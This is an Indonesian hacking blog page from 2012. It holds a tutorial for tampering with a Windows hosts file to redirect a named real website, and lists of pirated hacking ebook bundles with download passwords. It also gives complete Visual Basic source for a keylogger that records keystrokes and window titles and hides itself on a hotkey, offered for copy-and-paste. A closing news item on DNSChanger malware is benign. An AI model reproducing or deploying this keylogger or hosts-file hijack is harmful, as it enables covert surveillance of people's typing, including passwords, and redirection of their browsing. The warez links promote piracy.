.:: SELAMAT DATANG DI WWW.E-DUKASINET.TK / KITA BERAWAL DARI DUNIA MAYA. TAPI SUATU SAAT BAKAL JADI NYATA, DAN KENYATAAN ITU AKAN JADI SODARA AMIEN 3 X ::.

Pengeluaran  Togel 2012

Kamis, 12 Juli 2012

DNS Host URL File Hacking


semoga bermanfaat untuk kita semua.
Pernah kebayang gak saat kita mau buka website A tiba2 yang muncul malah website B, tapi anehnya Url nya adalah alamat website A ? wah…pikiran kita pasti langsung ke virus atau spyware, belum tentu, bisa aja ada seseorang yang iseng  telah menyusup ke system kita dan merubah file host untuk di arahkan ke Url yang dia kehendaki
Terus Gimana caranya ? cekicrot….
1. Buka cmd kamu dengan cara masuk menu run→cmd trus enter
2. Kalau udah masuk ketikkan
cd\windows\system32\drivers\etc
Seperti gambar di bawah ini :
Photobucket
3.  Cek dulu isi file hosts nya dengan perintah type hosts maka akan muncul seperti gambar dibawah ini
Photobucket
4. Muncul kan isi dari file hosts, terus gimana cara ngrubahnya ? gini caranya…ping dulu alamat yang mau dijadikan pengubah url target. Disini saya ambil contoh : www.kompas.co.id
Photobucket
5.  Nah, dapetkan IP nya.  tinggal nentuin sasarannya, website sasaran saya adalah www.jasaraharja.co.id, kalian boleh website apa aja.
6. jadi perintahnya adalah :
echo 202.146.4.100 www.jasaraharja.co.id >> hosts
trus enter deh.
Photobucket
7. Coba cek lagi di hosts nya tadi dengan perintah type hosts dah muncul kan perubahan
yang kita lakukan tadi…
Photobucket
8.  Buat nge-cek hasilnya,buka browser kamu dan coba browse ke www.jasaraharja.co.id
Pasti berubah tampilannya ke kompas.com, kaya ini nih..
Photobucket
Gak sulit kan membuat halaman website redirect ke halaman lain, hanya bermodalkan cmd aja.
Selamat Mencoba !  :)

Senin, 09 Juli 2012

Ebook Hacking Cracking Collection 2012

Kali ini berbagi ebook all in one [ AIO ] hacking collection 2012, ebook all in one [ AIO ] cracking collection 2012 untuk disimpan sebagai buku acuan untuk hacker & cracker di tahun 2012, berikut ini adalah ebook hacking facebook, ebook hack facebook, ebook hacking gmail, ebook hack gmail, ebook hacking yahoo, ebook hack yahoo, ebook hacking 2011. ebook hacking 2012, ebook cracking 2012, ebook hack 2012, ebook crack 2012, ebook hacker 2012, ebook cracker 2012, ebooks hacking 2012, ebooks cracking 2012, ebooks hack 2012, ebooks crack 2012, ebooks hacker 2012, ebooks cracker 2012, e-book hacking 2012, e-book cracking 2012, e-book hack 2012, e-book crack 2012, e-book hacker 2012, e-book cracker 2012, e-books hacking 2012, e-books cracking 2012, e-books hack 2012, e-books crack 2012, e-books hacker 2012, e-books cracker 2012. Silakan menggunakan ebook berikut untuk menambah ilmu pengetahuan dan wawasan. Berikut ini adalah Download Hacking Tools 2012, Hacking Tools 2012, Tools Hacking 2012, Cracking Tools 2012, Tools Cracking 2012, Tool Hack 2012, Tool Crack 2012, Tool Hacking 2012, Tool Cracking 2012, Tool Hacker 2012, Tool Cracker 2012, Tools Hacker 2012, Tools Cracker 2012 yang mungkin bisa bermanfaat untuk bisa anda pakai di 2012. Happy Hacking All.. Selamat download :)

PART 1


70 Hacking Ebook Collection 2011
English | 2011 | PDF | 700MB
Hacking The Windows Registry
Hugo Cornwall ? The Hacker?s Handbook
Hacking into computer systems -a beginners guide
Hacking_IIS_Servers
Addison-Wesley Professional.Honeypots- Tracking Hackers
Wiley.The Database Hacker?s Handbook- Defending Database Servers
John Wiley &_ Sons.Hacking GMail (ExtremeTech)
Hacking.Guide.V3.1
A-List Publishing.Hacker Linux Uncovered
Hacker?S.Delight
Hacker.Bibel
HackerHighSchool
Hacker?s Desk Reference
A Beginners Guide To Hacking Computer Systems
Addison Wesley ? Hackers Delight 2002
addison wesley ? web hacking ? attacks and defense
Addison Wesley, The Outlook Answer Book Useful Tips Tricks And Hacks (2005) Bbl Lotb
amazon-hacks
Anti-Hacker ToolKit ? McGraw Hill 2E 2004
Attacking the DNS Protocol
Auerbach.Practical.Hacking.Techniques.and.Counterm easures.Nov.2006
Auerbach.Pub.The.Hackers.Handbook.The.Strategy.Beh ind.Breaking.into.and.Defending.Networks
bsd-hacks
ceh-official-certified-ethical-hacker-review-guide-exam
Certified Ethical Hacker (CEH) v3.0 Official Course
Computer ? Hackers Secrets ? e-book
cracking-sql-passwords
Crc Press ? The Hacker?S Handbook
Credit.Card.Visa.Hack.Ucam.Cl.Tr.560
DangerousGoogle-SearchingForSecrets
database hacker handbook
Dummies ? Hack How To Create Keygens (1)
ebay-hacks-100-industrial-strength-tips-and-tools
ebook.oreilly.-.windows.xp.hacks.sharereactor
eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools
ethical hacking, student guide
excel-hacks
For.Dummies.Hacking.for.Dummies.Apr.2004.eBook-DDU
For.Dummies.Hacking.Wireless.Networks.For.Dummies. Sep.2005.eBook-DDU
google-hacks
Hack IT Security Through Penetration Testing
Hack Proofing ? Your Network ? Internet Tradecraft
Hack Proofing Linux A Guide to Open Source Security
Hack Proofing Sun Solaris 8
Hack Proofing Your E-Commerce Site
Hack Proofing Your Identity In The Information Age
Hack Proofing Your Network Second Edition
Hack Proofing Your Network_First Edition
Hack Proofing Your Web Applications
Hacker Disassembling Uncovered
hacker ethic
Hacker Linux Uncovered
Hacker Web Exploitation Uncovered
Hacker?S.Delight
hacker-disassembling
Hackers Beware
Hackers Secrets Revealed
Hackers Secrets
Hackers, Heroes Of The Computer Revolution
Hackers_Secrets
Hacker_s_Guide
Hacking ? Firewalls And Networks How To Hack Into Remote Computers
Hacking ? The Art of Exploitation
Hacking Cisco Routers
Hacking Exposed ? Network Security Secrets & Solutions, 2nd Edition
Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1
Hacking For Dummies 1
Hacking For Dummies 2
Hacking For Dummies

PART 2



Hacking And Security Ebooks Collection
Size: 1.07 GB
English | pdf + chm | 177 files
Books : Misc. Educational : English
CONTENT:
(Ebook – Computer) Hacking The Windows Registry
(eBook – PDF) Hugo Cornwall – The Hacker’s Handbook
(eBook pdf) Hacking into computer systems – a beginners guide
(ebook_-_pdf)_Hacking_IIS_Servers file*serve..com
0321108957.Addison-Wesley Professional.Honeypots- Tracking Hackers
0764578014.Wiley.The Database Hacker’s Handbook- Defending Database Servers
076459611X.John Wiley &_ Sons.Hacking GMail (ExtremeTech)
076459611X.John Wiley &amp_ Sons.Hacking GMail (ExtremeTech)
1246523-Hacking.Guide.V3.1
1931769508.A-List Publishing.Hacker Linux Uncovered
2212948-Hacker’S.Delight
285063-Hacker.Bibel.[278.kB_www.netz.ru]
3077366-HackerHighSchool
731986-Hacker’s Desk Reference
[0735710090]Hackers Beware Defending Your Network From The Wiley Hacker
A Beginners Guide To Hacking Computer Systems
Addison Wesley – Hackers Delight 2002
addison wesley – web hacking – attacks and defense
Addison Wesley, The Outlook Answer Book Useful Tips Tricks And Hacks (2005) Bbl Lotb
amazon-hacks
Anti-Hacker ToolKit – McGraw Hill 2E 2004
Attacking the DNS Protocol
Auerbach.Practical.Hacking.Techniques.and.Counterm easures.Nov.2006
Auerbach.Pub.The.Hackers.Handbook.The.Strategy.Beh ind.Breaking.into.and.Defending.Networks.Nov.20
bsd-hacks
ceh-official-certified-ethical-hacker-review-guide-exam-312-50.9780782144376.27422
Certified Ethical Hacker (CEH) v3.0 Official Course
Computer – Hackers Secrets – e-book
kracking-sql-passwords
Crc Press – The Hacker’S Handbook
Credit.Card.Visa.Hack.Ucam.Cl.Tr.560.[223.kB_www.netz.ru]
DangerousGoogle-SearchingForSecrets
database hacker handbook
Dummies – Hack How To Create Keygens (1)
ebay-hacks-100-industrial-strength-tips-and-tools
ebook.oreilly.-.windows.xp.hacks.sharereactor
eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools
ethical hacking, student guide
excel-hacks
For.Dummies.Hacking.for.Dummies.Apr.2004.eBook-DDU
For.Dummies.Hacking.Wireless.Networks.For.Dummies. Sep.2005.eBook-DDU
google-hacks
Hack IT Security Through Penetration Testing
Hack Proofing – Your Network – Internet Tradecraft
Hack Proofing Linux A Guide to Open Source Security – Stangler, Lane – Syngress – ISBN 1-928994-34-2
Hack Proofing Sun Solaris 8
Hack Proofing Your E-Commerce Site
Hack Proofing Your Identity In The Information Age
Hack Proofing Your Network Second Edition
Hack Proofing Your Network_First Edition
Hack Proofing Your Web Applications
Hack_Attacks_Revealed_A_Complete_Reference_With_Cu stom_Security_Hacking_Toolkit
Hack_IT_Security_Through_Penetration_Testing
Hacker Disassembling Uncovered
hacker ethic
Hacker Linux Uncovered
Hacker Web Exploitation Uncovered
Hacker’S.Delight
hacker-disassembling-uncovered.9781931769228.20035
Hacker_s_Guide
Hackers Beware
Hackers Secrets Revealed
Hackers Secrets
Hackers, Heroes Of The Computer Revolution
Hackers_Secrets
Hacking – Firewalls And Networks How To Hack Into Remote Computers
Hacking – The Art of Exploitation
Hacking Cisco Routers
Hacking Exposed – Network Security Secrets & Solutions, 2nd Edition
Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1
Hacking For Dummies 1
Hacking For Dummies 2
Hacking For Dummies
Hacking GMail
Hacking IIS Servers
Hacking into computer systems – a beginners guide
Hacking the Code – ASP.NET Web Application Security Cookbook (2004)
hacking the windows registry
Hacking Windows XP
Hacking-ebook – CIA-Book-of-Dirty-Tricks1
Hacking-Hacker’s Guide
Hacking-Hackers Secrets Revealed
Hacking-Hugo Cornwall-The Hacker’s Handbook
Hacking-The Hacker krackdown
Hacking.For.Dummies.Access.To.Other.People’s.Syste m.Made.Simple
Hacking.Guide.V3.1
Hackproofing Oracle Application Server
hacks
Halting.The.Hacker.A.Practical.Guide.To.Computer.S ecurity
How to krack CD Protections
John Wiley & Sons – Hacking For Dummies
John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eB ook-DDU
John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eB ook
John.Wiley.and.Sons.The.Art.of.Intrusion.The.Real. Stories.Behind.the.Exploits.of.Hackers.Intruders.a nd.Deceivers.Feb.2005.ISBN0764569597
Jon.Erickson.Hacking.The.Art.Of.Exploitation.No.St arch.Press.2003
linux-server-hacks
Linux-Server.Hacks-OReilly
little_black_book_oc_computer_viruses
mac-os-hacks
McGraw Hill – Web Applications (Hacking Exposed)
McGraw-Hill – Hacking Exposed, 3rd Ed – Hacking Exposed Win2
McGraw.Hacking.Exposed.Cisco.Networks
McGraw.Hill.HackNotes.Linux.and.Unix.Security.Port able.Reference.eBook-DDU
McGraw.Hill.HackNotes.Network.Security.Portable.Re ference.eB
McGraw.Hill.HackNotes.Network.Security.Portable.Re ference.eBook-DDU
McGraw.Hill.HackNotes.Web.Security.Portable.Refere nce.eBook-
McGraw.Hill.HackNotes.Web.Security.Portable.Refere nce.eBook-DDU
McGraw.Hill.HackNotes.Windows.Security.Portable.Re ference.eB
McGraw.Hill.HackNotes.Windows.Security.Portable.Re ference.eBook-DDU
Mind Hacks – Tips & Tricks for Using Your Brain
network-security-hacks
No.Starch.Press.Hacking.The.Art.Of.Exploitation
O’Reilly – Online Investing Hacks
O’Reilly.-.Network.Security.Hacks
O’Reilly.Windows.Server.Hack
O’Reilly.Windows.Server.Hack
O_Reilly_-_Windows_XP_Hacks
online-investing-hacks
OReilly Google Hacks, 1st Edition2003
OReilly – Flickr Hacks Tips and Tools for Sharing Photos Online (Feb 2006)
OReilly – Google Hacks
Oreilly Access Hacks Apr 2005
Oreilly, paypai Hacks (2004) Ddu
OReilly,.Digital.Video.Hacks.(2005).DDU.LotB
OReilly,.IRC.Hacks.(2004).DDU
oreilly,.visual.studio.hacks.(2005).ddu.lotb
Oreilly.Amazon.Hacks.eBook.LiB
oreilly.firefox.hacks.ebook-lib
OReilly.Google.Hacks.2nd.Edition.Dec.2004.ISBN0596 008570
OReilly.Google.Maps.Hacks.Jan.2006
Oreilly.Linux.Desktop.Hacks.Mar.2005.eBook-LiB
OReilly.Linux.Server.Hacks.Volume.Two.Dec.2005
OReilly.Network.Security.Hacks
OReilly.paypai.Hacks.Sep.2004.eBook-DDU
OReilly.PC.Hacks.Oct.2004.eBook-DDU
OReilly.Perl.Hacks.Tips.and.Tools.for.Programming. Debugging.and.Surviving.May.2006
OReilly.Skype.Hacks.Tips.and.Tools.for.Cheap.Fun.I nnovative.Phone.Service.Dec.2005
OReilly.SQL.Hacks.Nov.2006
OReilly.Statistics.Hacks.May.2006
OReilly.Ubuntu.Hacks.Tips.and.Tools.for.Exploring. Using.and.Tuning.Linux.Jun.2006
OReilly.VoIP.Hacks.Tips.and.Tools.for.Internet.Tel ephony.Dec.2005
oreilly.windows.xp.hacks.2nd.edition.feb.2005.lib
OReilly.Word.Hacks.Oct.2004.eBook-DDU
OSB.Ethical.Hacking.and.Countermeasures.EC.Council .Exam.312.50.Student.Courseware.eBook-LiB
PC Games – How to krack CD Protection
prentice hall – pipkin – halting the hacker- a practical guide to computer security, 2nd edition
Que – UNIX Hints Hacks
Que.Certified.Ethical.Hacker.Exam.Prep.Apr.2006
Security and Hacking – Anti-Hacker Tool Kit Second Edition
SoTayHacker1.0
spidering-hacks
SQL Hacks
SQLInjectionWhitePaper
Syngress – Hack Proofing Linux (2001)
Syngress – Hack Proofing Your Identity in the Information Age – 2002
Syngress – Hacking a Terror Network. The Silent Threat of Covert Channels
Syngress — Hack Proofing Your Wireless Network
Syngress Hack Proofing Your Identity in the Information Age
Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU
Syngress.Hack.the.Stack.Oct.2006
Syngress.Hacking.a.Terror.Network.Nov.2004.ISBN192 8994989
The Little Black Book Of Computer Virus
the-database-hackers-handbook-defending-database-servers.9780764578014.25524
The_20Little_20Black_20Book_20of_20Computer_20Viru ses
tivo-hacks.100-industrial-strength-tips-and-tools
u23_Wiley – Hacking GPS – 2005 – (By Laxxuss)
Websters.New.World.Websters.New.World.Hacker.Dicti onary.Sep.2006
Wiley.Hacking.Firefox.More.Than.150.Hacks.Mods.and .Customizations.Jul.2005.eBook-DDU
Wiley.Hacking.Google.Maps.and.Google.Earth.Jul.200 6
Wiley.Hacking.GPS.Mar.2005.ISBN0764598805
Wiley.Lifehacker.Dec.2006
Wiley.The.Database.Hackers.Handbook.Defending.Data base.Servers
Win XP Hacks oreilly 2003
Windows Server Hacks
WinXP SP1 Hack
Xbox-hack – AIM-2002-008
Yahoo.Hacks.Oct.2005
Enjoy!
Download Links:
Password: mac

PART 3


Hacking Ebooks Collection [AIO] 2011
English | 2011 | PDF | 116 Books | 1.2GB
Hacking Ebooks Collection (116 books)
Ebook – Computer) Hacking The Windows Registry.pdf
(eBook – PDF) Hugo Cornwall – The Hacker’s Handbook .pdf
(eBook pdf) Hacking into computer systems – a beginners guide.pdf
(ebook_-_pdf)_Hacking_IIS_Servers.pdf
A Beginners Guide To Hacking Computer Systems.pdf
amazon-hacks.chm
Attacking the DNS Protocol.pdf
Auerbach.Practical.Hacking.Techniques.and.Counterm easures.Nov.2006.pdf
bsd-hacks.pdf
Certified Ethical Hacker (CEH) v3.0 Official Course.pdf
Computer – Hackers Secrets – e-book.pdf
cracking-sql-passwords.pdf
Crc Press – The Hacker’S Handbook.pdf
Credit.Card.Visa.Hack.Ucam.Cl.Tr.560.[223.kB_www.netz.ru].pdf
DangerousGoogle-SearchingForSecrets.pdf
database hacker handbook.chm
Dummies – Hack How To Create Keygens (1).pdf
ebay-hacks-100-industrial-strength-tips-and-tools.pdf
eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools.chm
ethical hacking, student guide.pdf
excel-hacks.chm
google-hacks.pdf
Guide-to-Hacking-with-sub7 (1).doc
Hack IT Security Through Penetration Testing.pdf
Hack Proofing – Your Network – Internet Tradecraft.pdf
Hack Proofing Linux A Guide to Open Source Security – Stangler, Lane – Syngress – ISBN 1-928994-34-2.pdf
Hack Proofing Sun Solaris 8.pdf
Hack Proofing Your E-Commerce Site.pdf
Hack Proofing Your Identity In The Information Age.pdf
Hack Proofing Your Network Second Edition.pdf
Hack Proofing Your Network_First Edition.pdf
Hack Proofing Your Web Applications.pdf
Hacker Disassembling Uncovered.chm
hacker ethic.pdf
Hacker Linux Uncovered.chm
Hacker Web Exploitation Uncovered.chm
Hacker’S.Delight.chm
Hackers Beware.pdf
Hackers Secrets Revealed.pdf
Hackers Secrets.pdf
Hackers, Heroes Of The Computer Revolution.pdf
Hackers_Secrets.pdf
Hacker_s_Guide.pdf
Hacking – Firewalls And Networks How To Hack Into Remote Computers.pdf
Hacking – The Art of Exploitation.chm
Hacking Cisco Routers.pdf
Hacking Exposed – Network Security Secrets & Solutions, 2nd Edition.pdf
Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1.pdf
Hacking For Dummies 1.pdf
Hacking For Dummies 2.pdf
Hacking For Dummies.pdf
Hacking GMail.pdf
Hacking IIS Servers.pdf
Hacking into computer systems – a beginners guide.pdf
hacking the windows registry .pdf
Hacking Windows XP.pdf
Hacking-ebook – CIA-Book-of-Dirty-Tricks1.pdf
Hacking-Hacker’s Guide.pdf
Hacking-Hackers Secrets Revealed.pdf
Hacking-Hugo Cornwall-The Hacker’s Handbook .pdf
Hacking-The Hacker Crackdown.pdf
Hacking.For.Dummies.Access.To.Other.People’s.Syste m.Made.Simple.pdf
Hacking.Guide.V3.1.pdf
Hacking.nfo
Hacking.sfv
Hackproofing Oracle Application Server.pdf
Hack_Attacks_Revealed_A_Complete_Reference_With_Cu stom_Security_Hacking_Toolkit.
chm
Hack_IT_Security_Through_Penetration_Testing.chm
haking.txt
Halting.The.Hacker.A.Practical.Guide.To.Computer.S ecurity.chm
How to Crack CD Protections.pdf
John Wiley & Sons – Hacking For Dummies.pdf
John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eB ook-DDU.pdf
linux-server-hacks.pdf
little_black_book_oc_computer_viruses.pdf
mac-os-hacks.chm
McGraw-Hill – Hacking Exposed, 3rd Ed – Hacking Exposed Win2.pdf
McGraw.Hacking.Exposed.Cisco.Networks.chm
McGraw.Hill.HackNotes.Network.Security.Portable.Re ference.eB.pdf
McGraw.Hill.HackNotes.Web.Security.Portable.Refere nce.eBook-.pdf
McGraw.Hill.HackNotes.Windows.Security.Portable.Re ference.eB.pdf
Mind Hacks – Tips & Tricks for Using Your Brain.chm
network-security-hacks.chm
No.Starch.Press.Hacking.The.Art.Of.Exploitation.ch m
O’Reilly – Online Investing Hacks.chm
O’Reilly.-.Network.Security.Hacks.chm
O’Reilly.Windows.Server.Hack.chm
O’Reilly.Windows.Server.Hack.rar
online-investing-hacks.chm
OReilly Google Hacks, 1st Edition2003.pdf
OReilly – Google Hacks.pdf
Oreilly, Paypal Hacks (2004) Ddu.chm
OReilly,.IRC.Hacks.(2004).DDU.chm
OReilly.SQL.Hacks.Nov.2006.chm
OSB.Ethical.Hacking.and.Countermeasures.EC.Council .Exam.312.50.Student.Coursewar
e.eBook-LiB.chm
O_Reilly_-_Windows_XP_Hacks.chm
PC Games – How to Crack CD Protection.pdf
Security and Hacking – Anti-Hacker Tool Kit Second Edition.chm
SoTayHacker1.0.chm
spidering-hacks.chm
SQL Hacks.chm
SQLInjectionWhitePaper.pdf
Syngress – Hacking a Terror Network. The Silent Threat of Covert Channels.pdf
Syngress — Hack Proofing Your Wireless Network.pdf
Syngress Hack Proofing Your Identity in the Information Age.pdf
Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf
Syngress.Hack.the.Stack.Oct.2006.pdf
The Little Black Book Of Computer Virus.pdf
The_20Little_20Black_20Book_20of_20Computer_20Viru ses.pdf
tivo-hacks.100-industrial-strength-tips-and-tools.pdf
u23_Wiley – Hacking GPS – 2005 – (By Laxxuss).pdf
Wiley.The.Database.Hackers.Handbook.Defending.Data base.Servers.chm
Win XP Hacks oreilly 2003.chm
Windows Server Hacks.chm
WinXP SP1 Hack.pdf
Xbox-hack – AIM-2002-008.pdf
Yahoo.Hacks.Oct.2005.chm
DOWNLOAD LINK
Pass: Warez-home.net

semoga bermanfaat sumber dari binus hacker.... salam satu jiwa ...

Membuat Key Logger Dengan Visual Basic

Assalamualaikum wr wb, salam sejahtera sobat Binus Hacker,
Sesuai dengan judul di atas, kali ini saya akan memberikan sedikit tutorial cara membuat key logger sederhana dengan Visual Basic. Oke langsung saja gan..
  1. Siapkan Visual Basic , Disini saya menggunakan Visual Basic 6.0
  2. Buka program Visual Basic
  3. New Project Standard EXE

  4. Tambahkan 1 buah TextBox, 4 buah CommandButton, 2 Timer, dan 6 buah Label (Lihat Gambar)
  5. Copas seluruh Code di bawah ini :
    Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
    Private Declare Function GetForegroundWindow Lib “user32″ () As Long
    Private Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hWnd As Long, ByVal sWndTitle As String, ByVal cLen As Long) As Long
    Private hForegroundWnd As Long
    Private backs As BooleanPrivate Sub Command1_Click()
    Timer1.Enabled = True
    End SubPrivate Sub Command2_Click()
    Timer1.Enabled = False
    End SubPrivate Sub Command3_Click()
    backs = True
    End SubPrivate Sub Command4_Click()
    backs = False
    End SubPrivate Sub Form_Load()
    backs = True
    End SubPrivate Sub Label1_Click()
    End Sub
    Private Sub Label4_Click()
    End Sub
    Private Sub Label6_Click()
    Timer1.Enabled = True
    End Sub
    Private Sub Label7_Click()
    Timer1.Enabled = False
    End Sub
    Private Sub Label8_Click()
    backs = True
    End Sub
    Private Sub Label9_Click()
    backs = False
    End Sub
    Private Sub Text1_Change()
    Text1.SelStart = 0
    Text1.SelLength = Len(Text1.Text)
    End Sub
    Private Sub Timer1_Timer()
    Dim x, x2, i, t As Integer
    Dim win As Long
    Dim Title As String * 1000
    win = GetForegroundWindow()
    If (win = hForegroundWnd) Then
    GoTo Keylogger
    Else
    hForegroundWnd = GetForegroundWindow()
    Title = “”
    GetWindowText hForegroundWnd, Title, 1000
    Select Case Asc(Title)
    Case 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95
    Text1.Text = Text1.Text & vbCrLf & vbCrLf & “[ " & Title
    Text1.Text = Text1.Text & " ]” & vbCrLf
    End Select
    End If
    Exit Sub
    Keylogger:
    For i = 65 To 90
    x = GetAsyncKeyState(i)
    x2 = GetAsyncKeyState(16)
    If x = -32767 Then
    If x2 = -32768 Then
    Text1.Text = Text1.Text & Chr(i)
    Else: Text1.Text = Text1.Text & Chr(i + 32)
    End If
    End If
    Next
    For i = 8 To 222
    If i = 65 Then i = 91
    x = GetAsyncKeyState(i)
    x2 = GetAsyncKeyState(16)
    If x = -32767 Then
    Select Case i
    Case 48
    Text1.Text = Text1.Text & IIf(x2 = -32768, “)”, “0″)
    Case 49
    Text1.Text = Text1.Text & IIf(x2 = -32768, “!”, “1″)
    Case 50
    Text1.Text = Text1.Text & IIf(x2 = -32768, “@”, “2″)
    Case 51
    Text1.Text = Text1.Text & IIf(x2 = -32768, “#”, “3″)
    Case 52
    Text1.Text = Text1.Text & IIf(x2 = -32768, “$”, “4″)
    Case 53
    Text1.Text = Text1.Text & IIf(x2 = -32768, “%”, “5″)
    Case 54
    Text1.Text = Text1.Text & IIf(x2 = -32768, “^”, “6″)
    Case 55
    Text1.Text = Text1.Text & IIf(x2 = -32768, “&”, “7″)
    Case 56
    Text1.Text = Text1.Text & IIf(x2 = -32768, “*”, “8″)
    Case 57
    Text1.Text = Text1.Text & IIf(x2 = -32768, “(“, “9″)
    Case 112: Text1.Text = Text1.Text & ” F1 “
    Case 113: Text1.Text = Text1.Text & ” F2 “
    Case 114: Text1.Text = Text1.Text & ” F3 “
    Case 115: Text1.Text = Text1.Text & ” F4 “
    Case 116: Text1.Text = Text1.Text & ” F5 “
    Case 117: Text1.Text = Text1.Text & ” F6 “
    Case 118: Text1.Text = Text1.Text & ” F7 “
    Case 119: Text1.Text = Text1.Text & ” F8 “
    Case 120: Text1.Text = Text1.Text & ” F9 “
    Case 121: Text1.Text = Text1.Text & ” F10 “
    Case 122: Text1.Text = Text1.Text & ” F11 “
    Case 123: Text1.Text = Text1.Text & ” F12 “
    Case 220: Text1.Text = Text1.Text & IIf(x2 = -32768, “|”, “\”)
    Case 188: Text1.Text = Text1.Text & IIf(x2 = -32768, “<”, “,”)
    Case 189: Text1.Text = Text1.Text & IIf(x2 = -32768, “_”, “-”)
    Case 190: Text1.Text = Text1.Text & IIf(x2 = -32768, “>”, “.”)
    Case 191: Text1.Text = Text1.Text & IIf(x2 = -32768, “?”, “/”)
    Case 187: Text1.Text = Text1.Text & IIf(x2 = -32768, “+”, “=”)
    Case 186: Text1.Text = Text1.Text & IIf(x2 = -32768, “:”, “;”)
    Case 222: Text1.Text = Text1.Text & IIf(x2 = -32768, Chr(34), “‘”)
    Case 219: Text1.Text = Text1.Text & IIf(x2 = -32768, “{“, “[")
    Case 221: Text1.Text = Text1.Text & IIf(x2 = -32768, "}", "]“)
    Case 192: Text1.Text = Text1.Text & IIf(x2 = -32768, “~”, “`”)
    Case 8: If backs = True Then If Len(Text1.Text) > 0 Then Text1.Text = Mid(Text1.Text, 1, Len(Text1.Text) – 1)
    Case 9: Text1.Text = Text1.Text & ” [ Tab ] “
    Case 13: Text1.Text = Text1.Text & vbCrLf
    Case 17: Text1.Text = Text1.Text & ” [ Ctrl ]“
    Case 18: Text1.Text = Text1.Text & ” [ Alt ] “
    Case 19: Text1.Text = Text1.Text & ” [ Pause ] “
    Case 20: Text1.Text = Text1.Text & ” [ Capslock ] “
    Case 27: Text1.Text = Text1.Text & ” [ Esc ] “
    Case 32: Text1.Text = Text1.Text & ” “
    Case 33: Text1.Text = Text1.Text & ” [ PageUp ] “
    Case 34: Text1.Text = Text1.Text & ” [ PageDown ] “
    Case 35: Text1.Text = Text1.Text & ” [ End ] “
    Case 36: Text1.Text = Text1.Text & ” [ Home ] “
    Case 37: Text1.Text = Text1.Text & ” [ Left ] “
    Case 38: Text1.Text = Text1.Text & ” [ Up ] “
    Case 39: Text1.Text = Text1.Text & ” [ Right ] “
    Case 40: Text1.Text = Text1.Text & ” [ Down ] “
    Case 41: Text1.Text = Text1.Text & ” [ Select ] “
    Case 44: Text1.Text = Text1.Text & ” [ PrintScreen ] “
    Case 45: Text1.Text = Text1.Text & ” [ Insert ] “
    Case 46: Text1.Text = Text1.Text & ” [ Del ] “
    Case 47: Text1.Text = Text1.Text & ” [ Help ] “
    Case 91, 92: Text1.Text = Text1.Text & ” [ Windows ] “
    End Select
    End If
    Next
    End Sub
    Private Sub Timer2_Timer()
    Dim a, b, x As Long
    a = GetAsyncKeyState(120)
    b = GetAsyncKeyState(121)
    x = GetAsyncKeyState(16)
    If a = -32767 And x = -32768 Then Me.Hide
    If b = -32767 And x = -32768 Then Me.Show
    End Sub
  6. Jalankan dengan menekan tombol F5
  7. Live demo bisa di download disini :
Selamat mencoba, semoga bermanfaat tutorial sederhana membuat keylogger ini. Wassalam…

Jumat, 06 Juli 2012

Siap-siap Jelang Kiamat Internet

Siap-siap Jelang Kiamat Internet  


Ancaman kiamat Internet tinggal hitungan hari. Tepatnya 9 Juli 2012, sekitar 500 ribu peranti keras yang terinfeksi bisa mati total karena serangan malware DNS. DNS atau Domain Name System adalah layanan Internet yang mengubah nama domain seperti www.tempo.co menjadi kode angka, sehingga antarkomputer bisa saling berkomunikasi.
Tapi, sejumlah penjahat telah menginfeksi dunia cyber dengan malware bernama DNSChanger. Virus ini memungkinkan penjahat dunia maya bisa mengendalikan server DNS. Akibatnya pencoleng jagat cyber ini bisa mengacaukan akses Internet pemilik komputer dan membahayakan interaksi antarkomputer yang telah terinfeksi.
Namun tenang ada cara untuk mengecek penyebaran serangan ini. Pertama bukalah situs www.dns-ok.us. Laman ini akan menunjukkan apakah komputer terjangkit malware. Jika tertulis DNS Resolution = Green, berarti komputer aman. Tapi jika DNS Resolution berwarna merah, hati-hati itu indikator awal terinfeksi.
Tak hanya situs www.dns-ok.us, Google pun membuat sebuah aplikasi yang memperingatkan ancaman ini. Mesin pencari raksasa ini akan menampilkan peringatan bagi komputer yang terindikasi kena malware jika membuka google.com. Dalam peringatan tersebut, Google juga menambahkan tautan untuk menghapus serangan malware.
Google memprediksi sekitar 500 ribu lebih komputer sudah terinfeksi DNSChanger Trojan. Sejumlah ahli keamanan komputer sebenarnya sudah memenangkan gugatan tentang akses pengendalian infrastruktur yang dikelola para peretas trojan itu. Sayangnya kemenangan mereka tahun lalu itu tidak diikuti dengan izin mematikan infrastruktur menjelang kiamat Internet, 9 Juli 2012.
Pada Maret 2012, FBI telah mendapatkan izin dari pengadilan untuk membiarkan server membersihkan DNS mereka sendiri. Solusi ini bersifat sementara karena mengizinkan korban untuk membersihkan DNS mereka dan mengembalikan ke pengaturan normal DNS. Tapi hanya sampai 9 Juli 2012, komputer yang masih terinfeksi DNSChanger tetap akan menerima kiamat Internet
FBI.GOV | KREBSONSECURITY | DIANING SARI

Semoga berita ini bermanfaat bagi kita semua jangan lupa komentarnya makasi...!!!!


Cara Selamat dari Kiamat Internet



